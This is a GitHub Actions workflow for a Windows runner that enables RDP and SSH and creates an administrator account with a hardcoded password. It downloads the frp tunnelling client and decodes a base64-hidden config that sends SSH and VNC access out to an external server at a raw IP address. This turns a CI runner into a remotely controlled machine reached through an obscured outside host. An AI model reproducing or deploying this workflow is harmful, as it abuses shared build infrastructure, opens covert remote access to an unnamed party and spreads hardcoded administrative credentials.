name: Enable RDP and SSH on Windows Runner

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  enable-rdp-ssh:
    runs-on: windows-latest

    steps:
    - name: Enable RDP
      run: |
        netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      shell: powershell

    - name: Enable SSH
      run: |
        Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
        Start-Service sshd
        Set-Service -Name sshd -StartupType 'Automatic'
        New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
      shell: powershell

    - name: Add User 'finan' with Complex Password
      run: |
        $password = ConvertTo-SecureString "ComplexPassword123!" -AsPlainText -Force
        New-LocalUser -Name "finan" -Password $password -FullName "Finan User" -Description "User account for Finan"
        Add-LocalGroupMember -Group "Users" -Member "finan"
        Add-LocalGroupMember -Group "Administrators" -Member "finan"
      shell: powershell

    - name: Download FRPC
      run: |
        Invoke-WebRequest -Uri "https://github.com/fatedier/frp/releases/download/v0.37.0/frp_0.37.0_windows_amd64.zip" -OutFile frp.zip
        Expand-Archive -Path frp.zip -DestinationPath frp
      shell: powershell

    - name: Decrypt Base64 string and create frpc.toml
      run: |
        $base64String = "c2VydmVyQWRkciA9ICIxODUuMTU5LjEyOC4xMTEiCnNlcnZlclBvcnQgPSA3MDAwCgpbW3Byb3hpZXNdXQpuYW1lID0gInNzaCIKdHlwZSA9ICJ0Y3AiCmxvY2FsSVAgPSAiMTI3LjAuMC4xIgpsb2NhbFBvcnQgPSAyMgpyZW1vdGVQb3J0ID0gNjAyMgoKCltbcHJveGllc11dCm5hbWUgPSAidm5jIgp0eXBlID0gInRjcCIKbG9jYWxJUCA9ICIxMjcuMC4wLjEiCmxvY2FsUG9ydCA9IDU5MDEKcmVtb3RlUG9ydCA9IDU5MDEKCltbcHJveGllc11dCm5hbWUgPSAibm9WbmMiCnR5cGUgPSAidGNwIgpsb2NhbElQID0gIjEyNy4wLjAuMSIKbG9jYWxQb3J0ID0gNjkwMQpyZW1vdGVQb3J0ID0gNjkwMQoKCltbcmVtb3RlXQp1c2VyID0gImZpbmFuIgpwYXNzd29yZCA9ICJDb21wbGV4UGFzc3dvcmQxMjMhIgo="
        $decodedString = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64String))
        Set-Content -Path frp/frpc.toml -Value $decodedString
      shell: powershell

    - name: Run FRPC
      run: |
        $frpcPath = Join-Path -Path (Get-Location) -ChildPath "frp/frpc.exe"
        if (Test-Path $frpcPath) {
            & $frpcPath -c frpc.toml
        } else {
            Write-Error "frpc.exe not found at $frpcPath"
        }
      shell: powershell

    - name: Display RDP and SSH Status
      run: |
        Get-Service -Name TermService
        Get-Service -Name sshd
      shell: powershell
